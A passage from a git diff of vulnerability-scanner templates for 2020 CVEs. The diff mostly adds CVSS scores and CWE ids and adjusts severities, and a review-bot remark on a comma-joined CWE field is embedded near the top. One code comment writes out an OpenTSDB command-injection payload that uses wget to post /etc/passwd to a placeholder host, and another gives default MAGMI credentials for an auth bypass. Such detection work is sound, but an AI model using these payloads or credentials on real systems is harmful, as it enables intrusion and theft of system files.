https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index e320eb589c..135292b076 100644 --- a/cves/2020/CVE-2020-28208.yaml 
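Review bot: `cwe-id: CWE-306,CWE-312` in the CVE-2020-27986 hunk packs two identifiers into one comma-separated scalar, while every other `cwe-id` added in this commit holds exactly one identifier. If the template schema reads `cwe-id` as a plain string, anything that indexes or filters templates by CWE will see the literal `CWE-306,CWE-312` and match neither id; if the schema accepts several values, a YAML sequence (`cwe-id:` followed by `- CWE-306` and `- CWE-312`) is the unambiguous form and avoids relying on the consumer splitting on commas. I would confirm which form the schema supports and use either the sequence or a single primary CWE rather than the joined string.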
+++ b/cves/2020/CVE-2020-28208.yaml @@ -7,6 +7,11 @@ info: description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 tags: cve,cve2020,rockethchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 4e77e68e53..d8708d874c 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -10,6 +10,11 @@ info: - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 tags: cve,cve2020,monitorr,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 3ecd474e88..a271437130 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -3,12 +3,17 @@ id: CVE-2020-28976 info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter - severity: high + severity: medium description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index 753c1c727b..9ff125238d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: pacsone,xss,cve,cve2020 reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml index 469d3e038c..b22baeb363 100644 --- a/cves/2020/CVE-2020-29227.yaml +++ b/cves/2020/CVE-2020-29227.yaml @@ -3,12 +3,16 @@ id: CVE-2020-29227 info: name: Car Rental Management System 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-29227 requests: - method: GET diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml index 1072df2e03..ca81ff5115 100644 --- a/cves/2020/CVE-2020-29395.yaml +++ b/cves/2020/CVE-2020-29395.yaml @@ -9,6 +9,11 @@ info: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 3e39b3447e..447eb86dbf 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -7,6 +7,11 @@ info: description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-29453 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml index 346ae735d7..10db5b0e82 100644 --- a/cves/2020/CVE-2020-3187.yaml +++ b/cves/2020/CVE-2020-3187.yaml @@ -3,13 +3,18 @@ id: CVE-2020-3187 info: name: CVE-2020-3187 author: KareemSe1im - severity: high + severity: critical description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 tags: cve,cve2020,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2020-3187 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml index 1a5f9d3e7f..5ffc08cf18 100644 --- a/cves/2020/CVE-2020-3452.yaml +++ b/cves/2020/CVE-2020-3452.yaml 
@@ -3,7 +3,7 @@ id: CVE-2020-3452 info: name: CVE-2020-3452 author: pdteam - severity: medium + severity: high description: | A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. reference: @@ -14,6 +14,11 @@ info: - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 tags: cve,cve2020,cisco,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml index 2470e2c195..205fad22a0 100644 --- a/cves/2020/CVE-2020-35338.yaml +++ b/cves/2020/CVE-2020-35338.yaml @@ -10,6 +10,11 @@ info: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa tags: cve,cve2020,wmt,default-login + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 requests: - method: GET path: 
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index a73f95890b..a84417bce6 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -10,6 +10,11 @@ info: # Extracting /etc/passwd to remote host:- # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35476 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index bac1875c05..e183ae1ea7 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -7,6 +7,11 @@ info: description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-35489 + cwe-id: CWE-434 requests: - method: GET diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index c5fa22a091..1f23d2e4e6 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml 
@@ -7,6 +7,11 @@ info: description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35580 + cwe-id: CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml index fe1febddde..435cffabbd 100644 --- a/cves/2020/CVE-2020-35598.yaml +++ b/cves/2020/CVE-2020-35598.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/49343 - https://www.cvedetails.com/cve/CVE-2020-35598 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35598 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index a5e9540ba2..fd466fe1a3 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -7,6 +7,11 @@ info: reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. tags: cve,cve2020,linksys,rce,oob,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 requests: - raw: 
diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f0af5aa3ab..632c7a5aad 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -19,6 +19,11 @@ info: Originated from Metasploit module, copyright (c) space-r7. tags: cve,cve2020,klog,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35729 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml index c2bfce5c8b..377a1e0aa0 100644 --- a/cves/2020/CVE-2020-35736.yaml +++ b/cves/2020/CVE-2020-35736.yaml @@ -9,6 +9,11 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-35736 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml index e772c16eec..072b62d728 100644 --- a/cves/2020/CVE-2020-35774.yaml +++ b/cves/2020/CVE-2020-35774.yaml @@ -8,6 +8,11 @@ info: server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774 tags: cve,cve2020,xss,twitter-server + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-35774 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index af6da1dcfa..8b32f9ef9f 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml 
@@ -10,6 +10,11 @@ info:
 description: |
 Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
 tags: cve,cve2020,xss,cisco
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-3580
+ cwe-id: CWE-79
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml
index 35f6119a3c..2cb08ab7d4 100644
--- a/cves/2020/CVE-2020-35846.yaml
+++ b/cves/2020/CVE-2020-35846.yaml
@@ -9,6 +9,11 @@ info:
 The $eq operator matches documents where the value of a field equals the specified value.
 reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
 tags: cve,cve2020,nosqli,sqli
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-35846
+ cwe-id: CWE-89
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml
index 2226a19d6f..9d33adc30f 100644
--- a/cves/2020/CVE-2020-35847.yaml
+++ b/cves/2020/CVE-2020-35847.yaml
@@ -9,6 +9,11 @@ info:
 which is responsible for changing the user password using the reset token.
 reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
 tags: cve,cve2020,nosqli,sqli
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-35847
+ cwe-id: CWE-89
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml
index 9e693b11c7..3b1a7d649a 100644
--- a/cves/2020/CVE-2020-35848.yaml
+++ b/cves/2020/CVE-2020-35848.yaml
@@ -9,6 +9,11 @@ info:
 which is responsible for displaying the user password reset form.
 reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
 tags: cve,cve2020,nosqli,sqli
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-35848
+ cwe-id: CWE-89
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml
index 835ccc29ed..0ab49a2bc9 100644
--- a/cves/2020/CVE-2020-35951.yaml
+++ b/cves/2020/CVE-2020-35951.yaml
@@ -8,6 +8,11 @@ info:
 An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
 reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
 tags: cve,cve2020,wordpress,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
+ cvss-score: 9.90
+ cve-id: CVE-2020-35951
+ cwe-id: CWE-306
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
index def510535d..474b9b212a 100644
--- a/cves/2020/CVE-2020-36112.yaml
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -9,6 +9,11 @@ info:
 - https://www.tenable.com/cve/CVE-2020-36112
 severity: critical
 tags: cve,cve2020,sqli,cse
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-36112
+ cwe-id: CWE-89
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml
index 9b1cb65ed5..134c4160f8 100644
--- a/cves/2020/CVE-2020-36289.yaml
+++ b/cves/2020/CVE-2020-36289.yaml
@@ -9,6 +9,11 @@ info:
 reference:
 - https://twitter.com/ptswarm/status/1402644004781633540
 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2020-36289
+ cwe-id: CWE-200
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml
index cff4fd841a..96e904d323 100644
--- a/cves/2020/CVE-2020-4463.yaml
+++ b/cves/2020/CVE-2020-4463.yaml
@@ -14,6 +14,11 @@ info:
 - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
 - https://github.com/Ibonok/CVE-2020-4463
 tags: cve,cve2020,ibm,xxe
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
+ cvss-score: 8.20
+ cve-id: CVE-2020-4463
+ cwe-id: CWE-611
 requests:
 - method: POST
diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml
index 90ae483682..97a56c996e 100644
--- a/cves/2020/CVE-2020-5284.yaml
+++ b/cves/2020/CVE-2020-5284.yaml
@@ -9,6 +9,11 @@ info:
 reference: https://github.com/zeit/next.js/releases/tag/v9.3.2
 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.30
+ cve-id: CVE-2020-5284
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml
index 6107fbb57a..160406214c 100644
--- a/cves/2020/CVE-2020-5307.yaml
+++ b/cves/2020/CVE-2020-5307.yaml
@@ -8,6 +8,11 @@ info:
 - https://cinzinga.com/CVE-2020-5307-5308/
 severity: critical
 tags: cve,cve2020,sqli
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-5307
+ cwe-id: CWE-89
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml
index a103e34d12..4a7aa0348f 100644
--- a/cves/2020/CVE-2020-5405.yaml
+++ b/cves/2020/CVE-2020-5405.yaml
@@ -3,10 +3,15 @@ id: CVE-2020-5405
 info:
 name: Spring Cloud Directory Traversal
 author: harshbothra_
- severity: high
+ severity: medium
 description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
 reference: https://pivotal.io/security/cve-2020-5405
 tags: cve,cve2020,lfi,springcloud
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2020-5405
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml
index 773e721bae..d4f7de242d 100644
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@@ -7,6 +7,11 @@ info:
 description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
 reference: https://tanzu.vmware.com/security/cve-2020-5410
 tags: cve,cve2020,lfi,springcloud
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-5410
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml
index a0b1eac7af..dad8fbb3f9 100644
--- a/cves/2020/CVE-2020-5412.yaml
+++ b/cves/2020/CVE-2020-5412.yaml
@@ -7,6 +7,11 @@ info:
 description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
 tags: cve,cve2020,ssrf,springcloud
 reference: https://tanzu.vmware.com/security/cve-2020-5412
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.50
+ cve-id: CVE-2020-5412
+ cwe-id: CWE-610
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index 513a3be8c5..23edf290ed 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -11,6 +11,11 @@ info:
 # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
 # in the event that a CSRF is leveraged against an existing admin session for MAGMI.
 # At the time of this advisory, no patch exists for this issue.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2020-5776
+ cwe-id: CWE-352
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml
index 6dbfb02778..ad90884501 100644
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-5777
 info:
 name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23
 author: dwisiswant0
- severity: high
+ severity: critical
 description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
 reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
 tags: cve,cve2020,magmi,magento
@@ -12,6 +12,11 @@ info:
 # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
 # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
 # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-5777
+ cwe-id: CWE-287
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml
index 08d43a9cd4..176b2b2136 100644
--- a/cves/2020/CVE-2020-5847.yaml
+++ b/cves/2020/CVE-2020-5847.yaml
@@ -2,10 +2,15 @@ id: CVE-2020-5847
 info:
 name: UnRaid Remote Code Execution
 author: madrobot
- severity: high
+ severity: critical
 description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code.
 reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
 tags: cve,cve2020,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-5847
+ cwe-id: CWE-94,CWE-668
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml
index e55a8ef228..c8698e5e5f 100644
--- a/cves/2020/CVE-2020-5902.yaml
+++ b/cves/2020/CVE-2020-5902.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-5902
 info:
 name: F5 BIG-IP TMUI RCE
 author: madrobot,dwisiswant0,ringo
- severity: high
+ severity: critical
 description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
 reference:
 - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html
@@ -18,6 +18,11 @@ info:
 - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/
 - https://www.kb.cert.org/vuls/id/290915
 tags: cve,cve2020,bigip,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-5902
+ cwe-id: CWE-22,CWE-829
 requests:
 - method: GET
diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml
index d36d906517..aa4f6887c5 100644
--- a/cves/2020/CVE-2020-6207.yaml
+++ b/cves/2020/CVE-2020-6207.yaml
@@ -14,6 +14,11 @@ info:
 - https://github.com/chipik/SAP_EEM_CVE-2020-6207
 - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/
 - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-6207
+ cwe-id: CWE-306
 requests:
 - raw:
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 46077c6fbd..d86e3db289 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -12,6 +12,11 @@ info:
 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
 - https://github.com/chipik/SAP_RECON
+ classification:
